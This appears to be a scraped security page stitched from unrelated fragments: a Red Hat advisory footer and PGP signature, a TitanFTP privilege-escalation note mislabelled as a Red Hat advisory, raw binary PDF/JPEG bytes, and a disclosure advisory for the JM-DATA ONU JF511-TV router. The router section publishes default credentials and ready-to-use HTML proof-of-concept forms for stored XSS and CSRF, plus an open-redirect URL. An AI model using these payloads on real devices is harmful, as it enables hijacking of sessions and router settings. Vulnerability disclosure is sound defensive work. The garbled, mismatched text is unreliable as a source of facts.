The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqod1tzjgjWX9erEAQhBKg//SHPCnzKfy01h9CMuvhjLi8tAwiOYOU9x  
tB+OQpJ979g2FAN6AWwCSesQzkpoOpLF9A/2QFnQsl33uWkVZmV32rniZ2BQ/FBj  
FDtU69ysQwSBgeySu6J+N34o1Wel78YagmTgPgIFCpT5GXL+/aGuSswq5WAqe41Y  
7k5flG0z6zDD108RNG7vUg0B2CPZkQkK18jj/OPUQtWlDA3S5RDGkDzX8onBNO1z  
7uKz6CtqCNVvd+J6XlgXq3hjGYKEs2+kic4Z5ezRGER3U7C9IfS0ZmZlCjr5jVSc  
UXghrbjFV0aKSZtwzPNhW/smfCXyqwQ7TtaGfRqzsoU4AvvmUEPYStnNw5P1CYq8  
1itaxdM0wSl+D2OcU8SGTMFgnMZBfHy79gopq7JPtcc5hx0gCyOt1M7N/0HmEBt7  
Oqj79IGh/Ok7OUbwwi5lNyOGBBl4M8KhNvHav5Y7loCP9usOhTAW/hFfRyasNnHD  
6DZVa+Cg1QN40O+T5UtMNTCpirAtIrQncjpjO3p0ZwCzR3a2yNJ+jMfGfpfN1Oif  
OlJWvwryUeSSRmX3H0afKn2IANG4qWMsrOesca3a0T+Cnw8AdFqfNEI5H0WDHpPo  
0K3jTAFGEPzpQAsmv/ENRah5+xMHvvzguX0Y876jNHeudoJBb+/bQtLbo9ZUR+Cp  
CIexjs+IfbE=  
=BOLW  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5055-01

An issue was discovered in TitanFTP (aka Titan FTP) NextGen before 1.2.1050. When installing, Microsoft SQL Express 2019 installs by default with an SQL instance running as SYSTEM with BUILTIN\Users as sysadmin, thus enabling unprivileged Windows users to execute commands locally as NT AUTHORITY\SYSTEM, aka NX-I674 (sub-issue 2).

%PDF-1.4 %���� 3 0 obj <> stream ����JFIFxx��ZExifMM\*JQQtQs������C��C��@�"�� ���}!1AQa"q2���#B��R��$3br� %&'()\*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������� ���w!1AQaq"2�B���� #3R�br� $4�%�&'()\*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������?�1���o?�G����<{��7���

CVE-2022-34006

JM-DATA ONU JF511-TV versions 1.0.67, 1.0.62, and 1.0.55 suffer from cross site request forgery, persistent cross site scripting, default credential, and open redirection vulnerabilities.

  
JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities

Vendor: JM-DATA GmbH  
Product web page: https://www.jm-data.at  
Affected version: 1.0.67  
                  1.0.62  
                  1.0.55

Summary: This ONU is the perfect GEPON home and business gateway.  
It is an all-rounder in perfection. It can BRIDGE/NAT/RIP ROUTEND  
and COMBINED.

Desc: The device suffers from multiple vulnerabilities including:  
Default Credentials, CSRF, Authenticated Stored XSS and Open Redirect.

Tested on: Boa/0.93.15

Vulnerability discovered by Neurogenesia  
                            @zeroscience

Advisory ID: ZSL-2022-5708  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php

24.04.2022

--

Default credentials:  
--------------------  
user:user

Stored XSS / HTML Injection:  
----------------------------  
<html>  
  <body>  
    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">  
      <input type="hidden" name="url" value="'><script>alert(document.cookie)</script>' />  
      <input type="hidden" name="action" value="ad" />  
      <input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />  
      <input type="submit" value="Go" />  
    </form>  
  </body>  
</html>

CSRF (delete IP entry filter):  
------------------------------  
<html>  
  <body>  
    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">  
      <input type="hidden" name="bcdata" value="ld3:idxi0eee" />  
      <input type="hidden" name="action" value="rm" />  
      <input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />  
      <input type="submit" value="Go" />  
    </form>

    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">  
      <input type="hidden" name="urlfilterEnble" value="off" />  
      <input type="hidden" name="action" value="rm" />  
      <input type="hidden" name="bcdata" value="ld3:idxi0eed3:idxi1eee" />  
      <input type="hidden" name="submit-url" value="https://192.168.1.2:8443/secu_urlfilter_cfg_en.asp" />  
      <input type="submit" value="Go" />  
    </form>  
  </body>  
</html>

Open Redirect:  
--------------  
https://192.168.1.2:8443/boaform/formWirelessTbl?submit-url=https://zeroscience.mk

common.js:  
----------  
/*  
 * isCharUnsafe - test a character whether is unsafe  
 * @c: character to test  
 */  
function isCharUnsafe(c)  
{  
  var unsafeString = "\"\\`\+\,='\t";

  return unsafeString.indexOf(c) != -1  
    || c.charCodeAt(0) <= 32  
    || c.charCodeAt(0) >= 123;  
}

/*  
 * isIncludeInvalidChar - test a string whether includes invalid characters  
 * @s: string to test  
 */  
function isIncludeInvalidChar(s)  
{  
  var i;

  for (i = 0; i < s.length; i++) {  
    if (isCharUnsafe(s.charAt(i)) == true)  
      return true;  
  }

  return false;  
}

Tag

#js